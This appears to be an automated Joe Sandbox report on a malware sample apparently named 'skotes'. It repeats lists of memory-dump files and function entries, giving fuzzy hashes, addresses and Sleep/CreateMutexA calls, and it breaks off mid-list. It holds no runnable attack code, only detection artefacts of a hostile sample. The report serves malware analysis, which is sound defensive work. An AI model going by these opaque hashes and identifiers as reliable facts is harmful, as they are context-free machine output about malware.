Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ca15fc10bdc568162d628143196cd56b6af1f28f47565e961c5f518f9ccce134
Instruction ID: 0803cd89f4a03b6a3fca6573dbb69e6ff9bc8aaade86a918a8aca459e9d4f805
Opcode Fuzzy Hash: ca15fc10bdc568162d628143196cd56b6af1f28f47565e961c5f518f9ccce134
Instruction Fuzzy Hash: DE314831A001809BEB089B7DDC89B6CB7EAEFC7310F204698E514E72D6D775A9848613

Function 00BEA418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00BEA963
CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981

Memory Dump Source

Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 8e9aca741eaa894238303c9900143f33e0728c8775bb1c1388cc1c4b4ad6e877
Instruction ID: 7a00870bd41a2151887a05420114fba0da79a5a9299ce95a49ec00d18c3237ff
Opcode Fuzzy Hash: 8e9aca741eaa894238303c9900143f33e0728c8775bb1c1388cc1c4b4ad6e877
Instruction Fuzzy Hash: 8B316A31A001809BEB18AB7DDCC9BADB7F6EFC2314F204298E414DB3D6D7B569848653

Function 00BEA54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00BEA963
CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981

Memory Dump Source

Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: bf4b6dd3acceb032dde962f72011f7196138a6e98219b6e3bc3b5d7fcca74e0c
Instruction ID: c98fe5cc8ba519f3bc091a7511265cb0881e9781cb4477446919c9aef9deb788
Opcode Fuzzy Hash: bf4b6dd3acceb032dde962f72011f7196138a6e98219b6e3bc3b5d7fcca74e0c
Instruction Fuzzy Hash: 33314A316001809BEB08DB7DCCC9B6CB7EAEBC6314F244698E414DB3D6C775A9818713

Function 00BEA682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00BEA963
CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981

Memory Dump Source

Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 631a93b0f2124f1b6c4b1a2765da8f07bdbf4b4cb5fc4efafc9c2c68f9c92d54
Instruction ID: 1b822ef93c029a6ae2e82c331b84ae7fba51e6e0ebcd5827c5ed24698ca75585
Opcode Fuzzy Hash: 631a93b0f2124f1b6c4b1a2765da8f07bdbf4b4cb5fc4efafc9c2c68f9c92d54
Instruction Fuzzy Hash: C1312A316001849BEB18DB7DDCC976DB7FAEF86310F244698E414D72D6C77569808653

Function 00BE9ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00BEA963
CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981

Memory Dump Source

Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 0b872fc9ef185470bc91c4fa82dd83611b1eaf754de53cb2ce3b36c65d6b0070
Instruction ID: 518a2da56f0f9915f853e8878cfc4b324cf1702c2e40d16f339cf64b74cc7bb4
Opcode Fuzzy Hash: 0b872fc9ef185470bc91c4fa82dd83611b1eaf754de53cb2ce3b36c65d6b0070
Instruction Fuzzy Hash: 3B214C317042809BEB189B6DECC5B6DF7E6EFC2310F204659E504C72D6DBB569858612

Function 00BEA856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00BEA963
CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981

Memory Dump Source

Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
